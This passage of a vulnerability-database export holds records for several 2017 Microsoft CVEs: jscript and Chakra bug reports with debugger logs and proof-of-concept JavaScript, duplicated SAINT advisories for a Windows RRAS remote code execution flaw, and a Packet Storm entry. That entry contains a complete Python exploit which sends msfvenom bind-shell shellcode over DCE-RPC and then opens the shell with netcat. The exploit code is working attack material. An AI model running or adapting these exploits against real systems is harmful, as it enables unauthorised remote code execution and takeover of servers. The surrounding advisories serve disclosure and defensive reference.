which, depending if a comparison function was specified or not, calls JsArrayStringHeapSort or JsArrayFunctionHeapSort. These (vulnerable) functions take several arguments, 2 of which are the input array length and the number of elements currently in the input array (this can be smaller than the array length). The vulnerable functions are going to allcoate 2 buffers to store intermediate data. The size of these buffers will be calculated based on *num_elements*. However, while filling those arrays it is possible that the number of elements is going to increase, which causes a heap overflow.\r\n\r\nDebug log:\r\n\r\n=========================================\r\n\r\n0:023> g\r\n(e5c.988): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\njscript!NameTbl::GetValCore+0x30:\r\n000007fe`f4f59df0 498900 mov qword ptr [<a href=\"https://crrev.com/8\" title=\"\" class=\"\" rel=\"nofollow\">r8</a>],rax ds:00000000`04603010=????????????????\r\n\r\n0:013> r\r\nrax=c0c0c0c0c0c00003 rbx=000000000443cf20 rcx=000000000441df90\r\nrdx=0000000000000003 rsi=0000000004603010 rdi=000000000441df90\r\nrip=000007fef4f59df0 rsp=00000000129a8e10 rbp=0000000000000000\r\n <a href=\"https://crrev.com/8\" title=\"\" class=\"\" rel=\"nofollow\">r8</a>=0000000004603010 <a href=\"https://crrev.com/9\" title=\"\" class=\"\" rel=\"nofollow\">r9</a>=000000000441fdc8 <a href=\"https://crrev.com/10\" title=\"\" class=\"\" rel=\"nofollow\">r10</a>=00000000040a9800\r\n<a href=\"https://crrev.com/11\" title=\"\" class=\"\" rel=\"nofollow\">r11</a>=00000000129a8e70 <a href=\"https://crrev.com/12\" title=\"\" class=\"\" rel=\"nofollow\">r12</a>=0000000003ecb690 <a href=\"https://crrev.com/13\" title=\"\" class=\"\" rel=\"nofollow\">r13</a>=0000000000000001\r\n<a href=\"https://crrev.com/14\" title=\"\" class=\"\" rel=\"nofollow\">r14</a>=0000000004603010 <a href=\"https://crrev.com/15\" title=\"\" class=\"\" rel=\"nofollow\">r15</a>=0000000000000259\r\niopl=0 nv up ei ng nz na pe cy\r\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010283\r\njscript!NameTbl::GetValCore+0x30:\r\n000007fe`f4f59df0 498900 mov qword ptr [<a href=\"https://crrev.com/8\" title=\"\" class=\"\" rel=\"nofollow\">r8</a>],rax ds:00000000`04603010=????????????????\r\n\r\n0:013> k\r\n # Child-SP RetAddr Call Site\r\n00 00000000`129a8e10 000007fe`f4f75f0e jscript!NameTbl::GetValCore+0x30\r\n01 00000000`129a8e70 000007fe`f4f761d8 jscript!ArrayObj::GetValAtIndex+0x62\r\n02 00000000`129a8eb0 000007fe`f4fbd5a2 jscript!ArrayObj::GetVal+0x28\r\n03 00000000`129a8f40 000007fe`f4fbcd90 jscript!JsArrayStringHeapSort+0x1a6\r\n04 00000000`129a90d0 000007fe`f4f5c2ec jscript!JsArraySort+0x270\r\n05 00000000`129a9180 000007fe`f4f5a9fe jscript!NatFncObj::Call+0x138\r\n06 00000000`129a9230 000007fe`f4f586ea jscript!NameTbl::InvokeInternal+0x3f8\r\n07 00000000`129a9350 000007fe`f4fadd72 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea\r\n08 00000000`129a93a0 000007fe`f4f5c2ec jscript!JsFncCall+0xc2\r\n09 00000000`129a9430 000007fe`f4f5a9fe jscript!NatFncObj::Call+0x138\r\n0a 00000000`129a94e0 000007fe`f4f5b234 jscript!NameTbl::InvokeInternal+0x3f8\r\n0b 00000000`129a9600 000007fe`f4f59852 jscript!VAR::InvokeByName+0x81c\r\n0c 00000000`129a9810 000007fe`f4f59929 jscript!VAR::InvokeDispName+0x72\r\n0d 00000000`129a9890 000007fe`f4f524b8 jscript!VAR::InvokeByDispID+0x1229\r\n0e 00000000`129a98e0 000007fe`f4f58ec2 jscript!CScriptRuntime::Run+0x5a6\r\n0f 00000000`129aa6e0 000007fe`f4f594b3 jscript!ScrFncObj::CallWithFrameOnStack+0x162\r\n10 00000000`129aa8f0 000007fe`f4f586ea jscript!NameTbl::InvokeInternal+0x2d3\r\n11 00000000`129aaa10 000007fe`f4f524b8 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea\r\n12 00000000`129aaa60 000007fe`f4f58ec2 jscript!CScriptRuntime::Run+0x5a6\r\n13 00000000`129ab860 000007fe`f4f58d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162\r\n14 00000000`129aba70 000007fe`f4f58b95 jscript!ScrFncObj::Call+0xb7\r\n15 00000000`129abb10 000007fe`f4f5e6c0 jscript!CSession::Execute+0x19e\r\n16 00000000`129abbe0 000007fe`f4f670e7 jscript!COleScript::ExecutePendingScripts+0x17a\r\n17 00000000`129abcb0 000007fe`f4f668d6 jscript!COleScript::ParseScriptTextCore+0x267\r\n18 00000000`129abda0 000007fe`ec595251 jscript!COleScript::ParseScriptText+0x56\r\n19 00000000`129abe00 000007fe`ecd1b320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1\r\n1a 00000000`129abe80 000007fe`ec596256 MSHTML!CScriptCollection::ParseScriptText+0x37f\r\n1b 00000000`129abf60 000007fe`ec595c8e MSHTML!CScriptData::CommitCode+0x3d9\r\n1c 00000000`129ac130 000007fe`ec595a11 MSHTML!CScriptData::Execute+0x283\r\n1d 00000000`129ac1f0 000007fe`ecd546fb MSHTML!CHtmScriptParseCtx::Execute+0x101\r\n1e 00000000`129ac230 000007fe`ec638a5b MSHTML!CHtmParseBase::Execute+0x235\r\n1f 00000000`129ac2d0 000007fe`ec512e39 MSHTML!CHtmPost::Broadcast+0x90\r\n20 00000000`129ac310 000007fe`ec56caef MSHTML!CHtmPost::Exec+0x4bb\r\n21 00000000`129ac520 000007fe`ec56ca40 MSHTML!CHtmPost::Run+0x3f\r\n22 00000000`129ac550 000007fe`ec56da12 MSHTML!PostManExecute+0x70\r\n23 00000000`129ac5d0 000007fe`ec570843 MSHTML!PostManResume+0xa1\r\n24 00000000`129ac610 000007fe`ec556fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43\r\n25 00000000`129ac660 000007fe`ecd84f78 MSHTML!CDwnChan::OnMethodCall+0x41\r\n26 00000000`129ac690 000007fe`ec479d75 MSHTML!GlobalWndOnMethodCall+0x240\r\n27 00000000`129ac730 00000000`76d19bbd MSHTML!GlobalWndProc+0x150\r\n28 00000000`129ac7b0 00000000`76d198c2 USER32!UserCallWinProcCheckWow+0x1ad\r\n29 00000000`129ac870 000007fe`f11a4a87 USER32!DispatchMessageWorker+0x3b5\r\n2a 00000000`129ac8f0 000007fe`f11ababb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555\r\n2b 00000000`129afb70 000007fe`fd48572f IEFRAME!LCIETab_ThreadProc+0x3a3\r\n2c 00000000`129afca0 000007fe`f521925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f\r\n2d 00000000`129afcd0 00000000`76e159cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f\r\n2e 00000000`129afd20 00000000`76f4a561 kernel32!BaseThreadInitThunk+0xd\r\n2f 00000000`129afd50 00000000`00000000 ntdll!RtlUserThreadStart+0x1d\r\n\r\n=========================================\r\n\r\n\r\nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse\r\nor a patch has been made broadly available, the bug report will become\r\nvisible to the public.\r\n\r\n\r\n\r\n\r\nFound by: ifratric\n\n# 0day.today [2018-01-03] #", "sourceHref": "https://0day.today/exploit/29261", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2021-07-29T16:40:26", "description": "Added: 06/06/2018 \nBID: [102055](<http://www.securityfocus.com/bid/102055>) \n\n\n### Background\n\nRouting Remote Access Service (RRAS) is a Microsoft API that can be used to create client applications. These applications display RAS common dialog boxes, manage remote access connections and devices, and manipulate phone-book entries. These APIs make it possible to create applications to administer the routing capabilities of the operating system. Additionally, developers can use the Routing Protocol APIs to implement routing protocols. \n\n### Problem\n\nWindows 7 SP1, Windows 8.1 and RT 8.1, Windows Server 2008 SP2 and R2 SP1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703 and 1709, Windows Server 2016 and Windows Server, version 1709 allow a remote code execution vulnerability due to the way the Routing and Remote Access service handles requests, aka \"Windows RRAS Service Remote Code Execution Vulnerability\". \n\n### Resolution\n\nConsider to disable the RRAS service if you are still using Windows Server 2003 or Apply a patch when Microsoft has issued to fix it. \n\n### References\n\n[https://www.exploit-db.com/exploits/44616/ \n](<https://www.exploit-db.com/exploits/44616/ <br>\n>) \n[https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11885 \n](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11885 <br>\n>) \n[http://www.securityfocus.com/bid/102055 \n](<http://www.securityfocus.com/bid/102055 <br>\n>) \n[http://www.securitytracker.com/id/1039987 \n](<http://www.securitytracker.com/id/1039987 <br>\n>) \n\n\n### Limitations\n\nThis exploit has been tested on Windows Server 2003 SP2 (ES). \n\nIt is effective only when the RRAS service is enabled. \n\n### Platforms\n\nWindows Server 2003 \n \n\n", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 6.6, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-06T00:00:00", "type": "saint", "title": "Windows RRAS Service Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11885"], "modified": "2018-06-06T00:00:00", "id": "SAINT:E09A7B11198664E783694CD57E5F0D4C", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/windows_smb_rras", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-26T11:31:55", "description": "Added: 06/06/2018 \nBID: [102055](<http://www.securityfocus.com/bid/102055>) \n\n\n### Background\n\nRouting Remote Access Service (RRAS) is a Microsoft API that can be used to create client applications. These applications display RAS common dialog boxes, manage remote access connections and devices, and manipulate phone-book entries. These APIs make it possible to create applications to administer the routing capabilities of the operating system. Additionally, developers can use the Routing Protocol APIs to implement routing protocols. \n\n### Problem\n\nWindows 7 SP1, Windows 8.1 and RT 8.1, Windows Server 2008 SP2 and R2 SP1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703 and 1709, Windows Server 2016 and Windows Server, version 1709 allow a remote code execution vulnerability due to the way the Routing and Remote Access service handles requests, aka \"Windows RRAS Service Remote Code Execution Vulnerability\". \n\n### Resolution\n\nConsider to disable the RRAS service if you are still using Windows Server 2003 or Apply a patch when Microsoft has issued to fix it. \n\n### References\n\n[https://www.exploit-db.com/exploits/44616/ \n](<https://www.exploit-db.com/exploits/44616/ <br>\n>) \n[https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11885 \n](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11885 <br>\n>) \n[http://www.securityfocus.com/bid/102055 \n](<http://www.securityfocus.com/bid/102055 <br>\n>) \n[http://www.securitytracker.com/id/1039987 \n](<http://www.securitytracker.com/id/1039987 <br>\n>) \n\n\n### Limitations\n\nThis exploit has been tested on Windows Server 2003 SP2 (ES). \n\nIt is effective only when the RRAS service is enabled. \n\n### Platforms\n\nWindows Server 2003 \n \n\n", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 6.6, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-06T00:00:00", "type": "saint", "title": "Windows RRAS Service Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11885"], "modified": "2018-06-06T00:00:00", "id": "SAINT:C4674FB138FD60F9330A06268CB37D2D", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/windows_smb_rras", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:31", "description": "Added: 06/06/2018 \nBID: [102055](<http://www.securityfocus.com/bid/102055>) \n\n\n### Background\n\nRouting Remote Access Service (RRAS) is a Microsoft API that can be used to create client applications. These applications display RAS common dialog boxes, manage remote access connections and devices, and manipulate phone-book entries. These APIs make it possible to create applications to administer the routing capabilities of the operating system. Additionally, developers can use the Routing Protocol APIs to implement routing protocols. \n\n### Problem\n\nWindows 7 SP1, Windows 8.1 and RT 8.1, Windows Server 2008 SP2 and R2 SP1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703 and 1709, Windows Server 2016 and Windows Server, version 1709 allow a remote code execution vulnerability due to the way the Routing and Remote Access service handles requests, aka \"Windows RRAS Service Remote Code Execution Vulnerability\". \n\n### Resolution\n\nConsider to disable the RRAS service if you are still using Windows Server 2003 or Apply a patch when Microsoft has issued to fix it. \n\n### References\n\n[https://www.exploit-db.com/exploits/44616/ \n](<https://www.exploit-db.com/exploits/44616/ <br>\n>) \n[https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11885 \n](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11885 <br>\n>) \n[http://www.securityfocus.com/bid/102055 \n](<http://www.securityfocus.com/bid/102055 <br>\n>) \n[http://www.securitytracker.com/id/1039987 \n](<http://www.securitytracker.com/id/1039987 <br>\n>) \n\n\n### Limitations\n\nThis exploit has been tested on Windows Server 2003 SP2 (ES). \n\nIt is effective only when the RRAS service is enabled. \n\n### Platforms\n\nWindows Server 2003 \n \n\n", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 6.6, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-06T00:00:00", "type": "saint", "title": "Windows RRAS Service Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11885"], "modified": "2018-06-06T00:00:00", "id": "SAINT:05B17BC33184A044F91ECA8B2568248B", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/windows_smb_rras", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2018-05-14T01:10:49", "description": "", "cvss3": {}, "published": "2018-05-13T00:00:00", "type": "packetstorm", "title": "Microsoft Windows 2003 SP2 RRAS SMB Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11885"], "modified": "2018-05-13T00:00:00", "id": "PACKETSTORM:147593", "href": "https://packetstormsecurity.com/files/147593/Microsoft-Windows-2003-SP2-RRAS-SMB-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/env python \n# -*- coding: utf-8 -*- \n#Tested in Windows Server 2003 SP2 (ES) - Only works when RRAS service is enabled. \n \n#The exploited vulnerability is an arbitraty pointer deference affecting the dwVarID field of the MIB_OPAQUE_QUERY structure. \n#dwVarID (sent by the client) is used as a pointer to an array of functions. The application doest not check if the pointer is #pointing out of the bounds of the array so is possible to jump to specific portions of memory achieving remote code execution. \n#Microsoft has not released a patch for Windows Server 2003 so consider to disable the RRAS service if you are still using \n#Windows Server 2003. \n \n#Exploit created by: VActor Portal \n#For learning purpose only \n \nimport struct \nimport sys \nimport time \nimport os \n \nfrom threading import Thread \n \nfrom impacket import smb \nfrom impacket import uuid \nfrom impacket import dcerpc \nfrom impacket.dcerpc.v5 import transport \n \ntarget = sys.argv[1] \n \nprint '[-]Initiating connection' \ntrans = transport.DCERPCTransportFactory('ncacn_np:%s[\\\\pipe\\\\browser]' % target) \ntrans.connect() \n \nprint '[-]connected to ncacn_np:%s[\\\\pipe\\\\browser]' % target \ndce = trans.DCERPC_class(trans) \n \n#RRAS DCE-RPC endpoint \ndce.bind(uuid.uuidtup_to_bin(('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0'))) \n \n#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b \"\\x00\" -f python \nbuf = \"\" \nbuf += \"\\xb8\\x3c\\xb1\\x1e\\x1d\\xd9\\xc8\\xd9\\x74\\x24\\xf4\\x5a\\x33\" \nbuf += \"\\xc9\\xb1\\x53\\x83\\xc2\\x04\\x31\\x42\\x0e\\x03\\x7e\\xbf\\xfc\" \nbuf += \"\\xe8\\x82\\x57\\x82\\x13\\x7a\\xa8\\xe3\\x9a\\x9f\\x99\\x23\\xf8\" \nbuf += \"\\xd4\\x8a\\x93\\x8a\\xb8\\x26\\x5f\\xde\\x28\\xbc\\x2d\\xf7\\x5f\" \nbuf += \"\\x75\\x9b\\x21\\x6e\\x86\\xb0\\x12\\xf1\\x04\\xcb\\x46\\xd1\\x35\" \nbuf += \"\\x04\\x9b\\x10\\x71\\x79\\x56\\x40\\x2a\\xf5\\xc5\\x74\\x5f\\x43\" \nbuf += \"\\xd6\\xff\\x13\\x45\\x5e\\x1c\\xe3\\x64\\x4f\\xb3\\x7f\\x3f\\x4f\" \nbuf += \"\\x32\\x53\\x4b\\xc6\\x2c\\xb0\\x76\\x90\\xc7\\x02\\x0c\\x23\\x01\" \nbuf += \"\\x5b\\xed\\x88\\x6c\\x53\\x1c\\xd0\\xa9\\x54\\xff\\xa7\\xc3\\xa6\" \nbuf += \"\\x82\\xbf\\x10\\xd4\\x58\\x35\\x82\\x7e\\x2a\\xed\\x6e\\x7e\\xff\" \nbuf += \"\\x68\\xe5\\x8c\\xb4\\xff\\xa1\\x90\\x4b\\xd3\\xda\\xad\\xc0\\xd2\" \nbuf += \"\\x0c\\x24\\x92\\xf0\\x88\\x6c\\x40\\x98\\x89\\xc8\\x27\\xa5\\xc9\" \nbuf += \"\\xb2\\x98\\x03\\x82\\x5f\\xcc\\x39\\xc9\\x37\\x21\\x70\\xf1\\xc7\" \nbuf += \"\\x2d\\x03\\x82\\xf5\\xf2\\xbf\\x0c\\xb6\\x7b\\x66\\xcb\\xb9\\x51\" \nbuf += \"\\xde\\x43\\x44\\x5a\\x1f\\x4a\\x83\\x0e\\x4f\\xe4\\x22\\x2f\\x04\" \nbuf += \"\\xf4\\xcb\\xfa\\xb1\\xfc\\x6a\\x55\\xa4\\x01\\xcc\\x05\\x68\\xa9\" \nbuf += \"\\xa5\\x4f\\x67\\x96\\xd6\\x6f\\xad\\xbf\\x7f\\x92\\x4e\\xae\\x23\" \nbuf += \"\\x1b\\xa8\\xba\\xcb\\x4d\\x62\\x52\\x2e\\xaa\\xbb\\xc5\\x51\\x98\" \nbuf += \"\\x93\\x61\\x19\\xca\\x24\\x8e\\x9a\\xd8\\x02\\x18\\x11\\x0f\\x97\" \nbuf += \"\\x39\\x26\\x1a\\xbf\\x2e\\xb1\\xd0\\x2e\\x1d\\x23\\xe4\\x7a\\xf5\" \nbuf += \"\\xc0\\x77\\xe1\\x05\\x8e\\x6b\\xbe\\x52\\xc7\\x5a\\xb7\\x36\\xf5\" \nbuf += \"\\xc5\\x61\\x24\\x04\\x93\\x4a\\xec\\xd3\\x60\\x54\\xed\\x96\\xdd\" \nbuf += \"\\x72\\xfd\\x6e\\xdd\\x3e\\xa9\\x3e\\x88\\xe8\\x07\\xf9\\x62\\x5b\" \nbuf += \"\\xf1\\x53\\xd8\\x35\\x95\\x22\\x12\\x86\\xe3\\x2a\\x7f\\x70\\x0b\" \nbuf += \"\\x9a\\xd6\\xc5\\x34\\x13\\xbf\\xc1\\x4d\\x49\\x5f\\x2d\\x84\\xc9\" \nbuf += \"\\x6f\\x64\\x84\\x78\\xf8\\x21\\x5d\\x39\\x65\\xd2\\x88\\x7e\\x90\" \nbuf += \"\\x51\\x38\\xff\\x67\\x49\\x49\\xfa\\x2c\\xcd\\xa2\\x76\\x3c\\xb8\" \nbuf += \"\\xc4\\x25\\x3d\\xe9\" \n \n#NDR format \nstub = \"\\x21\\x00\\x00\\x00\" #dwPid = PID_IP (IPv4) \nstub += \"\\x10\\x27\\x00\\x00\" #dwRoutingPID \nstub += \"\\xa4\\x86\\x01\\x00\" #dwMibInEntrySize \nstub += \"\\x41\"*4 #_MIB_OPAQUE_QUERY pointer \nstub += \"\\x04\\x00\\x00\\x00\" #dwVarID (_MIB_OPAQUE_QUERY) \nstub += \"\\x41\"*4 #rgdwVarIndex (_MIB_OPAQUE_QUERY) \nstub += \"\\xa4\\x86\\x01\\x00\" #dwMibOutEntrySize \nstub += \"\\xad\\x0b\\x2d\\x06\" #dwVarID ECX (CALL off_64389048[ECX*4]) -> p2p JMP EAX #dwVarID (_MIB_OPAQUE_QUERY) \nstub += \"\\xd0\\xba\\x61\\x41\\x41\" + \"\\x90\"*5 + buf + \"\\x41\"*(100000-10-len(buf)) #rgdwVarIndex (_MIB_OPAQUE_QUERY) \nstub += \"\\x04\\x00\\x00\\x00\" #dwId (_MIB_OPAQUE_INFO) \nstub += \"\\x41\"*4 #ullAlign (_MIB_OPAQUE_INFO) \n \n \ndce.call(0x1e, stub) #0x1d MIBEntryGetFirst (other RPC calls are also affected) \nprint \"[-]Exploit sent to target successfully...\" \n \nprint \"Waiting for shell...\" \ntime.sleep(5) \nos.system(\"nc \" + target + \" 4444\") \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/147593/mswin2003sp2rras-exec.txt", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-10T08:22:00", "description": "", "cvss3": {}, "published": "2018-01-10T00:00:00", "type": "packetstorm", "title": "Microsoft Edge Chakra JIT Escape Analysis Bug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11918"], "modified": "2018-01-10T00:00:00", "id": "PACKETSTORM:145787", "href": "https://packetstormsecurity.com/files/145787/Microsoft-Edge-Chakra-JIT-Escape-Analysis-Bug.html", "sourceData": "`Microsoft Edge: Chakra: JIT: Escape analysis bug \n \nCVE-2017-11918 \n \n \nEscape analysis: <a href=\"https://en.wikipedia.org/wiki/Escape_analysis\" title=\"\" class=\"\" rel=\"nofollow\">https://en.wikipedia.org/wiki/Escape_analysis</a> \n \nChakra fails to detect if \"tmp\" escapes the scope, allocates it to the stack. This may lead to dereference uninitialized stack values. \n \nPoC: \nfunction opt() { \nlet tmp = []; \ntmp[0] = tmp; \nreturn tmp[0]; \n} \n \nfunction main() { \nfor (let i = 0; i < 0x1000; i++) { \nopt(); \n} \n \nprint(opt()); // deref uninitialized stack pointers! \n} \n \nmain(); \n \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \n \nFound by: lokihardt \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/145787/GS20180110005019.txt", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-10T08:22:00", "description": "", "cvss3": {}, "published": "2018-01-10T00:00:00", "type": "packetstorm", "title": "Microsoft Edge Chakra JIT Op_MaxInAnArray / Op_MinInAnArray Misuse", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11893"], "modified": "2018-01-10T00:00:00", "id": "PACKETSTORM:145781", "href": "https://packetstormsecurity.com/files/145781/Microsoft-Edge-Chakra-JIT-Op_MaxInAnArray-Op_MinInAnArray-Misuse.html", "sourceData": "`Microsoft Edge: Chakra: JIT: Op_MaxInAnArray and Op_MinInAnArray can explicitly call user defined JavaScript functions \n \nCVE-2017-11893 \n \n \n1. Call patterns like \"Math.max.apply(Math, [1, 2, 3, 4, 5])\" and \"Math.max.apply(Math, arr)\" can be optimized to directly call the method \"JavascriptMath::MaxInAnArray\" in the Inline Phase. \n2. The method takes the original method \"Math.max\" as the first parameter and the arguments object as the second parameter. \n3. If the arguments object can't be handled by the method, it explicitly calls the original method \"Math.max\". \n4. But it doesn't check if the property \"Math.max\" has changed, so a user defined JavaScript function can be called without updating \"ImplicitCallFlags\". \n \nNote: Math.min as well. \n \nPoC: \nfunction opt(arr, arr2) { \narr[0] = 1.1; \nMath.max.apply(Math, arr2); \narr[0] = 2.3023e-320; \n} \n \nfunction main() { \nlet arr = [1.1, 2.2, 3.3, 4.4]; \nfor (let i = 0; i < 10000; i++) { \nopt(arr, [1, 2, 3, 4]); \n} \n \nMath.max = function () { \narr[0] = {}; \n}; \n \nopt(arr, {}); // can't handle, calls Math.max \nprint(arr[0]); \n} \n \nmain(); \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \n \nFound by: lokihardt \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/145781/GS20180110003945.txt", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-19T15:33:35", "description": "", "cvss3": {}, "published": "2017-12-19T00:00:00", "type": "packetstorm", "title": "Microsoft Windows jscript!RegExpFncObj::LastParen Out-Of-Bounds Read", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11906"], "modified": "2017-12-19T00:00:00", "id": "PACKETSTORM:145483", "href": "https://packetstormsecurity.com/files/145483/Microsoft-Windows-jscript-RegExpFncObj-LastParen-Out-Of-Bounds-Read.html", "sourceData": "`Windows: out-of-bounds read in jscript!RegExpFncObj::LastParen \n \nCVE-2017-11906 \n \n \nThere is an out-of-bounds read in jscript.dll library (used in IE, WPAD and other places): \n \nPoC for IE (note: page heap might be required to obsorve the crash): \n \n========================================= \n \n \n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=8\"></meta> \n<script language=\"Jscript.Encode\"> \n \nfunction go() { \nvar r= new RegExp(Array(100).join('()')); \n''.search(r); \nalert(RegExp.lastParen); \n} \n \ngo(); \n \n</script> \n \n========================================= \n \nDebug log: \n \n========================================= \n \n(cec.a14): Access violation - code c0000005 (first chance) \nFirst chance exceptions are reported before any exception handling. \nThis exception may be expected and handled. \njscript!RegExpFncObj::LastParen+0x43: \n000007fe`f23d3813 4863accbac000000 movsxd rbp,dword ptr [rbx+rcx*8+0ACh] ds:00000000`04770154=???????? \n \n0:014> r \nrax=0000000000000063 rbx=000000000476fd90 rcx=0000000000000063 \nrdx=0000000000000064 rsi=000000000476fd90 rdi=000007fef23d37d0 \nrip=000007fef23d3813 rsp=00000000130f9090 rbp=00000000130f9148 \n<a href=\"https://crrev.com/8\" title=\"\" class=\"\" rel=\"nofollow\">r8</a>=00000000130f9210 <a href=\"https://crrev.com/9\" title=\"\" class=\"\" rel=\"nofollow\">r9</a>=0000000000000000 <a href=\"https://crrev.com/10\" title=\"\" class=\"\" rel=\"nofollow\">r10</a>=000000000463fef0 \n<a href=\"https://crrev.com/11\" title=\"\" class=\"\" rel=\"nofollow\">r11</a>=000000000463ff38 <a href=\"https://crrev.com/12\" title=\"\" class=\"\" rel=\"nofollow\">r12</a>=0000000000000083 <a href=\"https://crrev.com/13\" title=\"\" class=\"\" rel=\"nofollow\">r13</a>=0000000000000000 \n<a href=\"https://crrev.com/14\" title=\"\" class=\"\" rel=\"nofollow\">r14</a>=00000000130f9210 <a href=\"https://crrev.com/15\" title=\"\" class=\"\" 